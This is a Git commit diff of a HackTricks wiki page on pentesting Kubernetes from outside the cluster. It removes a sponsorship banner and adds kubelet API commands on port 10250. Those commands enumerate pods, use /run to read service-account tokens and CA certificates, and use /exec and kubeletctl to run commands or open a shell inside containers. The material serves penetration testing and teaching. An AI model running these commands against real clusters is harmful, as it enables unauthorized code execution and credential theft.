coelner/hacktricks
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

GitBook: [#3243] No subject

Browse Source
This commit is contained in:
CPol 2022-06-08 13:35:11 +00:00 committed by gitbook-bot
parent 572e6090b8
commit cdfb73fade
No known key found for this signature in database
GPG Key ID: 07D2180C7B12D0FF
1 changed files with 21 additions and 21 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

42
pentesting/pentesting-kubernetes/pentesting-kubernetes-from-the-outside.md
View File

@ -1,21 +1,5 @@
# Pentesting Kubernetes Services
<details>
<summary><strong>Support HackTricks and get benefits!</strong></summary>
Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details>
{% hint style="danger" %}
<img src="../../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
@ -93,6 +77,7 @@ If you find this service exposed you might have found an [**unauthenticated RCE*
```
curl -k https://<IP address>:10250/metrics
curl -k https://<IP address>:10250/pods
curl -k https://<IP address>:10250/runningpods/
```
If the response is `Unauthorized` then it requires authentication.
@ -104,7 +89,7 @@ kubectl get nodes -o custom-columns='IP:.status.addresses[0].address,KUBELET_POR
ip=$(echo $node | awk '{print $1}')
port=$(echo $node | awk '{print $2}')
echo "curl -k --max-time 30 https://$ip:$port/pods"
echo "curl -k --max-time 30 https://$ip:2379/version" #Check also for etcd
echo "curl -k --max-time 30 https://$ip:2379/version" #Check also for etcd
done
```
@ -199,15 +184,30 @@ This endpoint list pods and their containers:
curl -ks https://worker:10250/pods
```
#### /exec
#### /exec & /run
This endpoint allows to execute code inside any container very easily:
```bash
# Tthe command is passed as an array (split by spaces) and that is a GET request.
curl -Gks https://worker:10250/exec/{namespace}/{pod}/{container} \
-d 'input=1' -d 'output=1' -d 'tty=1' \
# You can get all the namespaces, pods and containers running with:
curl -k https://10.10.11.133:10250/pods | jq -r '.items[] | [.metadata.namespace, .metadata.name, [.spec.containers[].name]]'
curl -k https://10.10.11.133:10250/runningpods/ | jq -r '.items[] | [.metadata.namespace, .metadata.name, [.spec.containers[].name]]'
# /run
curl -XPOST -k https://10.10.11.133:10250/run/{namespace}/{pod}/{container} \
-d "cmd=cat /var/run/secrets/kubernetes.io/serviceaccount/ca.crt /var/run/secrets/kubernetes.io/serviceaccount/token"
# /exec
# The command is passed as an array (split by spaces) and that is a GET request.
curl -sk -X POST -H "X-Stream-Protocol-Version: v2.channel.k8s.io" -H "X-Stream-Protocol-Version: channel.k8s.io" \
https://worker:10250/exec/{namespace}/{pod}/{container} \
-d 'input=1' -d 'output=1' -d 'tty=1' \
-d 'command=ls' -d 'command=/'
# Using kubeletctl
## get kubeletctl from releases in https://github.com/cyberark/kubeletctl
kubeletctl exec /bin/sh -n <namespace> -p <pod> -c <container> -s <IP> --cacert ./ca.crt
kubeletctl exec /bin/sh -p kube-proxy-84qt4 -c kube-proxy -n kube-system -s 10.129.227.136 --cacert ./ca.crt
```
To automate the exploitation you can also use the script [**kubelet-anon-rce**](https://github.com/serain/kubelet-anon-rce).